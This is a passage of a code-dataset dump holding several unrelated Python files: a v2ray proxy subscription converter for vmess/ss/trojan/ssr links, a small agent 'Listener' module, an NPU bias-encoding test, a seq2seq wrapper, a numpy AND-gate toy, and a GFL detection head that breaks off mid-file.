print(f'yaml_encode 解析 trojan 节点发生错误: {err}')\n pass\n\n yaml_content_dic = {'proxies': url_list}\n if output:\n yaml_content = yaml.dump(yaml_content_dic, default_flow_style=False, sort_keys=False, allow_unicode=True, width=750, indent=2)\n else:\n yaml_content = yaml_content_dic\n return yaml_content\n def base64_encode(url_content): # 将 URL 内容转换为 Base64\n base64_content = base64.b64encode(url_content.encode('utf-8')).decode('ascii')\n return base64_content\n\n def yaml_decode(url_content): # YAML 文本转换为 URL 链接内容\n try:\n if isinstance(url_content, dict):\n sub_content = url_content\n else:\n sub_content = convert.format(url_content)\n proxies_list = sub_content['proxies']\n\n protocol_url = []\n for index in range(len(proxies_list)): # 不同节点订阅链接内容 https://github.com/hoochanlon/fq-book/blob/master/docs/append/srvurl.md\n proxy = proxies_list[index]\n\n if proxy['type'] == 'vmess': # Vmess 节点提取, 由 Vmess 所有参数 dump JSON 后 base64 encode 得来。\n\n yaml_default_config = {\n 'name': 'Vmess Node', 'server': '0.0.0.0', 'port': 0, 'uuid': '', 'alterId': 0,\n 'cipher': 'auto', 'network': 'ws', 'ws-headers': {'Host': proxy['server']},\n 'ws-path': '/', 'tls': '', 'sni': ''\n }\n\n yaml_default_config.update(proxy)\n proxy_config = yaml_default_config\n\n vmess_value = {\n 'v': 2, 'ps': proxy_config['name'], 'add': proxy_config['server'],\n 'port': proxy_config['port'], 'id': proxy_config['uuid'], 'aid': proxy_config['alterId'],\n 'scy': proxy_config['cipher'], 'net': proxy_config['network'], 'type': None, 'host': proxy_config['ws-headers']['Host'],\n 'path': proxy_config['ws-path'], 'tls': 
proxy_config['tls'], 'sni': proxy_config['sni']\n                    }\n\n                    vmess_raw_proxy = json.dumps(vmess_value, sort_keys=False, indent=2, ensure_ascii=False)\n                    vmess_proxy = str('vmess://' + convert.base64_encode(vmess_raw_proxy) + '\\n')\n                    protocol_url.append(vmess_proxy)\n\n                elif proxy['type'] == 'ss': # SS 节点提取, 由 ss_base64_decoded 部分(参数: 'cipher', 'password', 'server', 'port') Base64 编码后 加 # 加注释(URL_encode) \n                    ss_base64_decoded = str(proxy['cipher']) + ':' + str(proxy['password']) + '@' + str(proxy['server']) + ':' + str(proxy['port'])\n                    ss_base64 = convert.base64_encode(ss_base64_decoded)\n                    ss_proxy = str('ss://' + ss_base64 + '#' + str(urllib.parse.quote(proxy['name'])) + '\\n')\n                    protocol_url.append(ss_proxy)\n\n                elif proxy['type'] == 'trojan': # Trojan 节点提取, 由 trojan_proxy 中参数再加上 # 加注释(URL_encode) # trojan Go https://p4gefau1t.github.io/trojan-go/developer/url/\n                    if 'tls' in proxy.keys() and 'network' in proxy.keys():\n                        if proxy['tls'] == True and proxy['network'] != 'tcp':\n                            network_type = proxy['network']\n                            trojan_go = f'?security=tls&type={network_type}&headerType=none'\n                        elif proxy['tls'] == False and proxy['network'] != 'tcp':\n                            network_type = proxy['network']\n                            trojan_go = f'?allowInsecure=0&type={network_type}&headerType=none'\n                        else:\n                            trojan_go = '?allowInsecure=1'\n                    else:\n                        trojan_go = '?allowInsecure=1'  # default when 'tls'/'network' keys are absent\n                    if 'sni' in proxy.keys():\n                        trojan_go = trojan_go+'&sni='+proxy['sni']\n                    trojan_proxy = str('trojan://' + str(proxy['password']) + '@' + str(proxy['server']) + ':' + str(proxy['port']) + trojan_go + '#' + str(urllib.parse.quote(proxy['name'])) + '\\n')\n                    protocol_url.append(trojan_proxy)\n\n                elif proxy['type'] == 'ssr': # ssr 节点提取, 由 ssr_base64_decoded 中所有参数总体 base64 encode\n                    remarks = convert.base64_encode(proxy['name']).replace('+', '-')\n                    server = proxy['server']\n                    port = str(proxy['port'])\n                    password = convert.base64_encode(proxy['password'])\n                    cipher = proxy['cipher']\n                    protocol = proxy['protocol']\n                    obfs = proxy['obfs']\n                    for key in {'group', 'obfsparam', 'protoparam'}:\n                        if key in proxy:\n                            if key == 'group':\n                                group = convert.base64_encode(proxy[key])\n                            elif key == 'obfsparam':\n                                obfsparam = convert.base64_encode(proxy[key])\n                            elif key == 'protoparam':\n                                protoparam = convert.base64_encode(proxy[key])\n                        else:\n                            if key == 'group':\n                                group = 'U1NSUHJvdmlkZXI'\n                            elif key == 'obfsparam':\n                                obfsparam = ''\n                            elif key == 'protoparam':\n                                protoparam = ''\n\n                    ssr_proxy = 'ssr://'+convert.base64_encode(server+':'+port+':'+protocol+':'+cipher+':'+obfs+':'+password+'/?group='+group+'&remarks='+remarks+'&obfsparam='+obfsparam+'&protoparam='+protoparam+'\\n')\n                    protocol_url.append(ssr_proxy)\n\n            yaml_content = ''.join(protocol_url)\n            return yaml_content\n        except Exception as err:\n            print(f'yaml decode 发生 {err} 错误')\n            return '订阅内容解析错误'\n\n    def base64_decode(url_content): # Base64 转换为 URL 链接内容\n        if '-' in url_content:\n            url_content = url_content.replace('-', '+')\n        if '_' in url_content:\n            url_content = url_content.replace('_', '/')\n        #print(len(url_content))\n        missing_padding = len(url_content) % 4\n        if missing_padding != 0:\n            url_content += '='*(4 - missing_padding) # 不是4的倍数后加= https://www.cnblogs.com/wswang/p/7717997.html\n        try:\n            base64_content = base64.b64decode(url_content.encode('utf-8')).decode('utf-8','ignore') # https://www.codenong.com/42339876/\n            base64_content_format = base64_content\n            return base64_content_format\n        except UnicodeDecodeError:\n            base64_content = base64.b64decode(url_content)\n            base64_content_format = base64_content\n            return str(base64_content)\n\n    def convert_remote(url='', output_type='clash', host='http://127.0.0.1:25500'): 
#{url='订阅链接', output_type={'clash': 输出 Clash 配置, 'base64': 输出 Base64 配置, 'url': 输出 url 配置}, host='远程订阅转化服务地址'}\n # 使用远程订阅转换服务,输出相应配置。\n sever_host = host\n url = urllib.parse.quote(url, safe='') # https://docs.python.org/zh-cn/3/library/urllib.parse.html\n if output_type == 'clash':\n converted_url = sever_host+'/sub?target=clash&url='+url+'&insert=false&emoji=true&list=true'\n try:\n resp = requests.get(converted_url)\n except Exception as err:\n print(err)\n return 'Url 解析错误'\n if resp.text == 'No nodes were found!':\n sub_content = 'Url 解析错误'\n else:\n sub_content = convert.makeup(convert.format(resp.text), dup_rm_enabled=False, format_name_enabled=True)\n elif output_type == 'base64':\n converted_url = sever_host+'/sub?target=mixed&url='+url+'&insert=false&emoji=true&list=true'\n try:\n resp = requests.get(converted_url)\n except Exception as err:\n print(err)\n return 'Url 解析错误'\n if resp.text == 'No nodes were found!':\n sub_content = 'Url 解析错误'\n else:\n sub_content = convert.base64_encode(resp.text)\n elif output_type == 'url':\n converted_url = sever_host+'/sub?target=mixed&url='+url+'&insert=false&emoji=true&list=true'\n try:\n resp = requests.get(converted_url)\n except Exception as err:\n print(err)\n return 'Url 解析错误'\n if resp.text == 'No nodes were found!':\n sub_content = 'Url 解析错误'\n else:\n sub_content = resp.text\n\n return sub_content\n","repo_name":"mfuu/v2ray","sub_path":"utils/sub_convert.py","file_name":"sub_convert.py","file_ext":"py","file_size_in_byte":38742,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"60"} +{"seq_id":"12417216489","text":"from dataclasses import dataclass\n\nfrom ecs import Entity\n\nfrom src.engine.meme import Idea\nfrom src.engine.ai import Perception\n\n\n@dataclass\nclass Listener:\n trust_k: float = .9\n idea_weight_threshold: float = .5\n\n def use(self, subject, perception: Perception) -> list[Idea]:\n return [\n Idea(sound.idea.meme, sound.idea.weight * self.trust_k, sound.parent)\n for sound in perception.hearing.values()\n if sound is not None\n and sound.parent is not subject\n and sound.idea is not None\n and sound.idea.weight >= self.idea_weight_threshold\n ]\n","repo_name":"girvel/fallen","sub_path":"src/library/ai_modules/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41427220117","text":"import random\n\nimport numpy as np\n\nfrom ethosu.vela.api import npu_encode_bias\n\n\ndef test_encode_bias():\n bias_lower_limit = -(1 << (40 - 1))\n bias_upper_limit = (1 << (40 - 1)) - 1\n scale_lower_limit = 0\n scale_upper_limit = (1 << 32) - 1\n shift_lower_limit = 0\n shift_upper_limit = (1 << 6) - 1\n\n for _ in range(30):\n bias = np.int64(random.randint(bias_lower_limit, bias_upper_limit))\n scale = int(random.randint(scale_lower_limit, scale_upper_limit))\n shift = int(random.randint(shift_lower_limit, shift_upper_limit))\n biases_enc = npu_encode_bias(bias, scale, shift)\n assert isinstance(biases_enc, bytearray)\n assert len(biases_enc) == 10\n","repo_name":"nxp-imx/ethos-u-vela","sub_path":"ethosu/vela/test/extapi/test_extapi_encode_bias.py","file_name":"test_extapi_encode_bias.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"26788145895","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nimport sys\n\nclass 
Seq2seq(nn.Module):\n    def __init__(self, encoder, decoder):\n        super(Seq2seq, self).__init__()\n        self.encoder = encoder\n        self.decoder = decoder\n\n    def flatten_parameters(self):\n        self.encoder.rnn.flatten_parameters()\n        self.decoder.rnn.flatten_parameters()\n\n    def forward(self, input_variable, input_lengths=None, target_l_variables=None, \n        target_x_variables=None, target_y_variables=None, target_w_variables=None, \n        target_h_variables=None, is_training=0, early_stop_len=None):\n        encoder_outputs, encoder_hidden = self.encoder(input_variable, input_lengths)\n        result = self.decoder(encoder_hidden=encoder_hidden,\n                              encoder_outputs=encoder_outputs,\n                              target_l_variables=target_l_variables,\n                              target_x_variables=target_x_variables,\n                              target_y_variables=target_y_variables,\n                              target_w_variables=target_w_variables,\n                              target_h_variables=target_h_variables,\n                              is_training=is_training,\n                              early_stop_len=early_stop_len)\n        return result\n","repo_name":"jamesli1618/Obj-GAN","sub_path":"box_generation/seq2seq/models/seq2seq.py","file_name":"seq2seq.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":286,"dataset":"github-code","pt":"60"}
{"seq_id":"70914929791","text":"import numpy as np\n\n\ndef main():\n    x1 = np.array([[0,0]])\n    x2 = np.array([[0,1]])\n    x3 = np.array([[1,0]])\n    x4 = np.array([[1,1]])\n\n    while True:\n        w=np.random.randn(2,2)\n        b=np.random.randn(2,)\n\n        xx1=(x1.dot(w)+b).argmax()\n        xx2=(x2.dot(w)+b).argmax()\n        xx3=(x3.dot(w)+b).argmax()\n        xx4=(x4.dot(w)+b).argmax()\n\n        #print(xx1,xx2,xx3,xx4)\n        if xx1==0 and xx2==0 and xx3==0 and xx4==1:\n            #and의 연산의 결과와 일치하면 반복문 종료\n            break\n\n    print(\"[0,0] : \",xx1)\n    print(\"[0,1] : \",xx2)\n    print(\"[1,0] : \",xx3)\n    print(\"[1,1] : \",xx4)\n    print(\"W:\",w)\n    print(\"b:\",b)\n\n\nif __name__ == '__main__':\n    main()","repo_name":"hayoungishere/AI_Bigdata","sub_path":"BigData_course/and_op.py","file_name":"and_op.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"16076280759","text":"# !/usr/bin/env python\r\n# -- coding: utf-8 --\r\n# @Time : 2021/3/29 9:03\r\n# @Author : liumin\r\n# @File : gfl_head.py\r\n\r\nfrom functools import partial\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.distributed as dist\r\nimport numpy as np\r\nfrom ..assigners.atss import ATSS\r\nfrom ..modules.scales import Scale\r\nfrom ..modules.convs import ConvModule\r\nfrom ..modules.init_weights import normal_init\r\nfrom ..modules.nms import multiclass_nms\r\nfrom ...losses.det.general_focal_losses import QualityFocalLoss, DistributionFocalLoss\r\nfrom ...losses.det.iou_losses import GIoULoss, bbox_overlaps\r\n\r\n\r\ndef multi_apply(func, *args, **kwargs):\r\n    pfunc = partial(func, **kwargs) if kwargs else func\r\n    map_results = map(pfunc, *args)\r\n    return tuple(map(list, zip(*map_results)))\r\n\r\n\r\ndef images_to_levels(target, num_level_anchors):\r\n    \"\"\"Convert targets by image to targets by feature level.\r\n    [target_img0, target_img1] -> [target_level0, target_level1, ...]\r\n    \"\"\"\r\n    target = torch.stack(target, 0)\r\n    level_targets = []\r\n    start = 0\r\n    for n in num_level_anchors:\r\n        end = start + n\r\n        level_targets.append(target[:, start:end].squeeze(0))\r\n        start = end\r\n    return level_targets\r\n\r\n\r\ndef distance2bbox(points, distance, max_shape=None):\r\n    \"\"\"Decode distance prediction to bounding box.\r\n    Args:\r\n        points (Tensor): Shape (n, 2), [x, y].\r\n        distance 
(Tensor): Distance from the given point to 4\r\n boundaries (left, top, right, bottom).\r\n max_shape (tuple): Shape of the image.\r\n Returns:\r\n Tensor: Decoded bboxes.\r\n \"\"\"\r\n x1 = points[:, 0] - distance[:, 0]\r\n y1 = points[:, 1] - distance[:, 1]\r\n x2 = points[:, 0] + distance[:, 2]\r\n y2 = points[:, 1] + distance[:, 3]\r\n if max_shape is not None:\r\n x1 = x1.clamp(min=0, max=max_shape[1])\r\n y1 = y1.clamp(min=0, max=max_shape[0])\r\n x2 = x2.clamp(min=0, max=max_shape[1])\r\n y2 = y2.clamp(min=0, max=max_shape[0])\r\n return torch.stack([x1, y1, x2, y2], -1)\r\n\r\n\r\ndef bbox2distance(points, bbox, max_dis=None, eps=0.1):\r\n \"\"\"Decode bounding box based on distances.\r\n Args:\r\n points (Tensor): Shape (n, 2), [x, y].\r\n bbox (Tensor): Shape (n, 4), \"xyxy\" format\r\n max_dis (float): Upper bound of the distance.\r\n eps (float): a small value to ensure target < max_dis, instead <=\r\n Returns:\r\n Tensor: Decoded distances.\r\n \"\"\"\r\n left = points[:, 0] - bbox[:, 0]\r\n top = points[:, 1] - bbox[:, 1]\r\n right = bbox[:, 2] - points[:, 0]\r\n bottom = bbox[:, 3] - points[:, 1]\r\n if max_dis is not None:\r\n left = left.clamp(min=0, max=max_dis - eps)\r\n top = top.clamp(min=0, max=max_dis - eps)\r\n right = right.clamp(min=0, max=max_dis - eps)\r\n bottom = bottom.clamp(min=0, max=max_dis - eps)\r\n return torch.stack([left, top, right, bottom], -1)\r\n\r\n\r\ndef distance2bbox_plus(points, distance, max_shape=None):\r\n \"\"\"Decode distance prediction to bounding box.\r\n\r\n Args:\r\n points (Tensor): Shape (n, 2), [x, y].\r\n distance (Tensor): Distance from the given point to 4\r\n boundaries (left, top, right, bottom).\r\n max_shape (tuple): Shape of the image.\r\n\r\n Returns:\r\n Tensor: Decoded bboxes.\r\n \"\"\"\r\n x1 = points[..., 0] - distance[..., 0]\r\n y1 = points[..., 1] - distance[..., 1]\r\n x2 = points[..., 0] + distance[..., 2]\r\n y2 = points[..., 1] + distance[..., 3]\r\n if max_shape is not None:\r\n x1 = x1.clamp(min=0, max=max_shape[1])\r\n y1 = y1.clamp(min=0, max=max_shape[0])\r\n x2 = x2.clamp(min=0, max=max_shape[1])\r\n y2 = y2.clamp(min=0, max=max_shape[0])\r\n return torch.stack([x1, y1, x2, y2], -1)\r\n\r\n\r\ndef reduce_mean(tensor):\r\n if not (dist.is_available() and dist.is_initialized()):\r\n return tensor\r\n tensor = tensor.clone()\r\n dist.all_reduce(tensor.true_divide(dist.get_world_size()), op=dist.ReduceOp.SUM)\r\n return tensor\r\n\r\n\r\nclass Integral(nn.Module):\r\n \"\"\"A fixed layer for calculating integral result from distribution.\r\n This layer calculates the target location by :math: `sum{P(y_i) * y_i}`,\r\n P(y_i) denotes the softmax vector that represents the discrete distribution\r\n y_i denotes the discrete set, usually {0, 1, 2, ..., reg_max}\r\n Args:\r\n reg_max (int): The maximal value of the discrete set. Default: 16. 
You\r\n            may want to reset it according to your new dataset or related\r\n            settings.\r\n    \"\"\"\r\n\r\n    def __init__(self, reg_max=16):\r\n        super(Integral, self).__init__()\r\n        self.reg_max = reg_max\r\n        self.register_buffer('project',\r\n                             torch.linspace(0, self.reg_max, self.reg_max + 1))\r\n\r\n    def forward(self, x):\r\n        \"\"\"Forward feature from the regression head to get integral result of\r\n        bounding box location.\r\n        Args:\r\n            x (Tensor): Features of the regression head, shape (N, 4*(n+1)),\r\n                n is self.reg_max.\r\n        Returns:\r\n            x (Tensor): Integral result of box locations, i.e., distance\r\n                offsets from the box center in four directions, shape (N, 4).\r\n        \"\"\"\r\n        x = F.softmax(x.reshape(-1, self.reg_max + 1), dim=1)\r\n        x = F.linear(x, self.project.type_as(x)).reshape(-1, 4)\r\n        return x\r\n\r\n\r\nclass GFLHead(nn.Module):\r\n    \"\"\"Generalized Focal Loss: Learning Qualified and Distributed Bounding\r\n    Boxes for Dense Object Detection.\r\n    GFL head structure is similar to ATSS; however, GFL uses\r\n    1) joint representation for classification and localization quality, and\r\n    2) flexible General distribution for bounding box locations,\r\n    which are supervised by\r\n    Quality Focal Loss (QFL) and Distribution Focal Loss (DFL), respectively\r\n    https://arxiv.org/abs/2006.04388\r\n    :param num_classes: Number of categories excluding the background category.\r\n    :param loss: Config of all loss functions.\r\n    :param input_channel: Number of channels in the input feature map.\r\n    :param feat_channels: Number of channels in the head's conv feature maps. Default: 256.\r\n    :param stacked_convs: Number of conv layers in cls and reg tower. Default: 4.\r\n    :param octave_base_scale: Scale factor of grid cells.\r\n    :param strides: Down sample strides of all level feature maps\r\n    :param conv_cfg: Dictionary to construct and config conv layer. Default: None.\r\n    :param norm_cfg: Dictionary to construct and config norm layer.\r\n    :param reg_max: Max value of integral set :math: `{0, ..., reg_max}`\r\n        in QFL setting. 
Default: 16.\r\n :param kwargs:\r\n \"\"\"\r\n def __init__(self,\r\n num_classes,\r\n loss,\r\n input_channel,\r\n feat_channels=256,\r\n stacked_convs=4,\r\n octave_base_scale=4,\r\n strides=[8, 16, 32],\r\n conv_cfg=None,\r\n norm_cfg=dict(type='GN', num_groups=32, requires_grad=True),\r\n reg_max=16,\r\n **kwargs):\r\n super(GFLHead, self).__init__()\r\n self.num_classes = num_classes\r\n self.in_channels = input_channel\r\n self.feat_channels = feat_channels\r\n self.stacked_convs = stacked_convs\r\n self.grid_cell_scale = octave_base_scale\r\n self.strides = strides\r\n self.reg_max = reg_max\r\n\r\n self.loss_cfg = loss\r\n self.conv_cfg = conv_cfg\r\n self.norm_cfg = norm_cfg\r\n self.cls_out_channels = num_classes\r\n\r\n self.assigner = ATSS(topk=9)\r\n self.distribution_project = Integral(self.reg_max)\r\n\r\n self.loss_qfl = QualityFocalLoss(beta=self.loss_cfg[\"loss_qfl\"][\"beta\"],\r\n loss_weight=self.loss_cfg[\"loss_qfl\"][\"loss_weight\"])\r\n self.loss_dfl = DistributionFocalLoss(loss_weight=self.loss_cfg[\"loss_dfl\"][\"loss_weight\"])\r\n self.loss_bbox = GIoULoss(loss_weight=self.loss_cfg[\"loss_bbox\"][\"loss_weight\"])\r\n self._init_layers()\r\n self.init_weights()\r\n\r\n def _init_layers(self):\r\n self.relu = nn.ReLU(inplace=True)\r\n self.cls_convs = nn.ModuleList()\r\n self.reg_convs = nn.ModuleList()\r\n for i in range(self.stacked_convs):\r\n chn = self.in_channels if i == 0 else self.feat_channels\r\n self.cls_convs.append(\r\n ConvModule(\r\n chn,\r\n self.feat_channels,\r\n 3,\r\n stride=1,\r\n padding=1,\r\n conv_cfg=self.conv_cfg,\r\n norm_cfg=self.norm_cfg))\r\n self.reg_convs.append(\r\n ConvModule(\r\n chn,\r\n self.feat_channels,\r\n 3,\r\n stride=1,\r\n padding=1,\r\n conv_cfg=self.conv_cfg,\r\n norm_cfg=self.norm_cfg))\r\n self.gfl_cls = nn.Conv2d(\r\n self.feat_channels,\r\n self.cls_out_channels,\r\n 3,\r\n padding=1)\r\n self.gfl_reg = nn.Conv2d(\r\n self.feat_channels, 4 * (self.reg_max + 1), 3, padding=1)\r\n self.scales = nn.ModuleList([Scale(1.0) for _ in self.strides])\r\n\r\n def init_weights(self):\r\n for m in self.cls_convs:\r\n normal_init(m.conv, std=0.01)\r\n for m in self.reg_convs:\r\n normal_init(m.conv, std=0.01)\r\n bias_cls = -4.595\r\n normal_init(self.gfl_cls, std=0.01, bias=bias_cls)\r\n normal_init(self.gfl_reg, std=0.01)\r\n\r\n def forward(self, feats):\r\n return multi_apply(self.forward_single, feats, self.scales)\r\n\r\n def forward_single(self, x, scale):\r\n cls_feat = x\r\n reg_feat = x\r\n for cls_conv in self.cls_convs:\r\n cls_feat = cls_conv(cls_feat)\r\n for reg_conv in self.reg_convs:\r\n reg_feat = reg_conv(reg_feat)\r\n cls_score = self.gfl_cls(cls_feat)\r\n bbox_pred = scale(self.gfl_reg(reg_feat)).float()\r\n return cls_score, bbox_pred\r\n\r\n def loss(self, preds, gt_meta):\r\n cls_scores, bbox_preds = preds\r\n batch_size = cls_scores[0].shape[0]\r\n device = cls_scores[0].device\r\n # gt_bboxes = gt_meta['gt_bboxes']\r\n # gt_labels = gt_meta['gt_labels']\r\n gt_bboxes = gt_meta['boxes']\r\n gt_labels = gt_meta['labels']\r\n gt_bboxes_ignore = None\r\n\r\n featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]\r\n\r\n cls_reg_targets = self.target_assign(batch_size, featmap_sizes, gt_bboxes,\r\n gt_bboxes_ignore, gt_labels, device=device)\r\n if cls_reg_targets is None:\r\n return None\r\n\r\n (grid_cells_list, labels_list, label_weights_list, bbox_targets_list,\r\n bbox_weights_list, num_total_pos, num_total_neg) = cls_reg_targets\r\n\r\n num_total_samples = reduce_mean(\r\n 
torch.tensor(num_total_pos).cuda()).item()\r\n num_total_samples = max(num_total_samples, 1.0)\r\n\r\n losses_qfl, losses_bbox, losses_dfl, \\\r\n avg_factor = multi_apply(\r\n self.loss_single,\r\n grid_cells_list,\r\n cls_scores,\r\n bbox_preds,\r\n labels_list,\r\n label_weights_list,\r\n bbox_targets_list,\r\n self.strides,\r\n num_total_samples=num_total_samples)\r\n\r\n avg_factor = sum(avg_factor)\r\n avg_factor = reduce_mean(avg_factor).item()\r\n if avg_factor <= 0:\r\n loss_qfl = torch.tensor(0, dtype=torch.float32, requires_grad=True).cuda()\r\n loss_bbox = torch.tensor(0, dtype=torch.float32, requires_grad=True).cuda()\r\n loss_dfl = torch.tensor(0, dtype=torch.float32, requires_grad=True).cuda()\r\n else:\r\n losses_bbox = list(map(lambda x: x / avg_factor, losses_bbox))\r\n losses_dfl = list(map(lambda x: x / avg_factor, losses_dfl))\r\n\r\n loss_qfl = sum(losses_qfl)\r\n loss_bbox = sum(losses_bbox)\r\n loss_dfl = sum(losses_dfl)\r\n\r\n loss = loss_qfl + loss_bbox + loss_dfl\r\n loss_states = dict(\r\n loss_qfl=loss_qfl,\r\n loss_bbox=loss_bbox,\r\n loss_dfl=loss_dfl)\r\n\r\n return loss, loss_states\r\n\r\n def loss_single(self, grid_cells, cls_score, bbox_pred, labels,\r\n label_weights, bbox_targets, stride, num_total_samples):\r\n\r\n grid_cells = grid_cells.reshape(-1, 4)\r\n cls_score = cls_score.permute(0, 2, 3,\r\n 1).reshape(-1, self.cls_out_channels)\r\n bbox_pred = bbox_pred.permute(0, 2, 3, 1).reshape(-1, 4 * (self.reg_max + 1))\r\n bbox_targets = bbox_targets.reshape(-1, 4)\r\n labels = labels.reshape(-1)\r\n label_weights = label_weights.reshape(-1)\r\n\r\n # FG cat_id: [0, num_classes -1], BG cat_id: num_classes\r\n bg_class_ind = self.num_classes\r\n pos_inds = torch.nonzero((labels >= 0)\r\n & (labels < bg_class_ind), as_tuple=False).squeeze(1)\r\n\r\n score = label_weights.new_zeros(labels.shape)\r\n\r\n if len(pos_inds) > 0:\r\n pos_bbox_targets = bbox_targets[pos_inds]\r\n pos_bbox_pred = bbox_pred[pos_inds] # (n, 4 * (reg_max + 1))\r\n pos_grid_cells = grid_cells[pos_inds]\r\n pos_grid_cell_centers = self.grid_cells_to_center(pos_grid_cells) / stride\r\n\r\n weight_targets = cls_score.detach().sigmoid()\r\n weight_targets = weight_targets.max(dim=1)[0][pos_inds]\r\n pos_bbox_pred_corners = self.distribution_project(pos_bbox_pred)\r\n pos_decode_bbox_pred = distance2bbox(pos_grid_cell_centers,\r\n pos_bbox_pred_corners)\r\n pos_decode_bbox_targets = pos_bbox_targets / stride\r\n score[pos_inds] = bbox_overlaps(\r\n pos_decode_bbox_pred.detach(),\r\n pos_decode_bbox_targets,\r\n is_aligned=True)\r\n pred_corners = pos_bbox_pred.reshape(-1, self.reg_max + 1)\r\n target_corners = bbox2distance(pos_grid_cell_centers,\r\n pos_decode_bbox_targets,\r\n self.reg_max).reshape(-1)\r\n\r\n # regression loss\r\n loss_bbox = self.loss_bbox(\r\n pos_decode_bbox_pred,\r\n pos_decode_bbox_targets,\r\n weight=weight_targets,\r\n avg_factor=1.0)\r\n\r\n # dfl loss\r\n loss_dfl = self.loss_dfl(\r\n pred_corners,\r\n target_corners,\r\n weight=weight_targets[:, None].expand(-1, 4).reshape(-1),\r\n avg_factor=4.0)\r\n else:\r\n loss_bbox = bbox_pred.sum() * 0\r\n loss_dfl = bbox_pred.sum() * 0\r\n weight_targets = torch.tensor(0).cuda()\r\n\r\n # qfl loss\r\n loss_qfl = self.loss_qfl(\r\n cls_score, (labels, score),\r\n weight=label_weights,\r\n avg_factor=num_total_samples)\r\n\r\n return loss_qfl, loss_bbox, loss_dfl, weight_targets.sum()\r\n\r\n def target_assign(self,\r\n batch_size,\r\n featmap_sizes,\r\n gt_bboxes_list,\r\n gt_bboxes_ignore_list,\r\n 
gt_labels_list,\r\n device):\r\n \"\"\"\r\n Assign target for a batch of images.\r\n :param batch_size: num of images in one batch\r\n :param featmap_sizes: A list of all grid cell boxes in all image\r\n :param gt_bboxes_list: A list of ground truth boxes in all image\r\n :param gt_bboxes_ignore_list: A list of all ignored boxes in all image\r\n :param gt_labels_list: A list of all ground truth label in all image\r\n :param device: pytorch device\r\n :return: Assign results of all images.\r\n \"\"\"\r\n # get grid cells of one image\r\n multi_level_grid_cells = [\r\n self.get_grid_cells(featmap_sizes[i],\r\n self.grid_cell_scale,\r\n stride,\r\n dtype=torch.float32,\r\n device=device) for i, stride in enumerate(self.strides)\r\n ]\r\n mlvl_grid_cells_list = [multi_level_grid_cells for i in range(batch_size)]\r\n\r\n # pixel cell number of multi-level feature maps\r\n num_level_cells = [grid_cells.size(0) for grid_cells in mlvl_grid_cells_list[0]]\r\n num_level_cells_list = [num_level_cells] * batch_size\r\n # concat all level cells and to a single tensor\r\n for i in range(batch_size):\r\n mlvl_grid_cells_list[i] = torch.cat(mlvl_grid_cells_list[i])\r\n # compute targets for each image\r\n if gt_bboxes_ignore_list is None:\r\n gt_bboxes_ignore_list = [None for _ in range(batch_size)]\r\n if gt_labels_list is None:\r\n gt_labels_list = [None for _ in range(batch_size)]\r\n # target assign on all images, get list of tensors\r\n # list length = batch size\r\n # tensor first dim = num of all grid cell\r\n (all_grid_cells, all_labels, all_label_weights, all_bbox_targets,\r\n all_bbox_weights, pos_inds_list, neg_inds_list) = multi_apply(\r\n self.target_assign_single_img,\r\n mlvl_grid_cells_list,\r\n num_level_cells_list,\r\n gt_bboxes_list,\r\n gt_bboxes_ignore_list,\r\n gt_labels_list)\r\n # no valid cells\r\n if any([labels is None for labels in all_labels]):\r\n return None\r\n # sampled cells of all images\r\n num_total_pos = sum([max(inds.numel(), 1) for inds in pos_inds_list])\r\n num_total_neg = sum([max(inds.numel(), 1) for inds in neg_inds_list])\r\n # merge list of targets tensors into one batch then split to multi levels\r\n mlvl_grid_cells = images_to_levels(all_grid_cells, num_level_cells)\r\n mlvl_labels = images_to_levels(all_labels, num_level_cells)\r\n mlvl_label_weights = images_to_levels(all_label_weights, num_level_cells)\r\n mlvl_bbox_targets = images_to_levels(all_bbox_targets, num_level_cells)\r\n mlvl_bbox_weights = images_to_levels(all_bbox_weights, num_level_cells)\r\n return (mlvl_grid_cells, mlvl_labels, mlvl_label_weights,\r\n mlvl_bbox_targets, mlvl_bbox_weights, num_total_pos,\r\n num_total_neg)\r\n\r\n def target_assign_single_img(self,\r\n grid_cells,\r\n num_level_cells,\r\n gt_bboxes,\r\n gt_bboxes_ignore,\r\n gt_labels):\r\n \"\"\"\r\n Using ATSS Assigner to assign target on one image.\r\n :param grid_cells: Grid cell boxes of all pixels on feature map\r\n :param num_level_cells: numbers of grid cells on each level's feature map\r\n :param gt_bboxes: Ground truth boxes\r\n :param gt_bboxes_ignore: Ground truths which are ignored\r\n :param gt_labels: Ground truth labels\r\n :return: Assign results of a single image\r\n \"\"\"\r\n device = grid_cells.device\r\n # gt_bboxes = torch.from_numpy(gt_bboxes).to(device)\r\n # gt_labels = torch.from_numpy(gt_labels).to(device)\r\n\r\n assign_result = self.assigner.assign(grid_cells, num_level_cells, gt_bboxes, gt_bboxes_ignore, gt_labels)\r\n\r\n pos_inds, neg_inds, pos_gt_bboxes, pos_assigned_gt_inds = \\\r\n 
self.sample(assign_result, gt_bboxes)\r\n\r\n        num_cells = grid_cells.shape[0]\r\n        bbox_targets = torch.zeros_like(grid_cells)\r\n        bbox_weights = torch.zeros_like(grid_cells)\r\n        labels = grid_cells.new_full((num_cells,),\r\n                                     self.num_classes,\r\n                                     dtype=torch.long)\r\n        label_weights = grid_cells.new_zeros(num_cells, dtype=torch.float)\r\n\r\n        if len(pos_inds) > 0:\r\n            pos_bbox_targets = pos_gt_bboxes\r\n            bbox_targets[pos_inds, :] = pos_bbox_targets\r\n            bbox_weights[pos_inds, :] = 1.0\r\n            if gt_labels is None:\r\n                # Only rpn gives gt_labels as None\r\n                # Foreground is the first class\r\n                labels[pos_inds] = 0\r\n            else:\r\n                labels[pos_inds] = gt_labels[pos_assigned_gt_inds]\r\n\r\n            label_weights[pos_inds] = 1.0\r\n        if len(neg_inds) > 0:\r\n            label_weights[neg_inds] 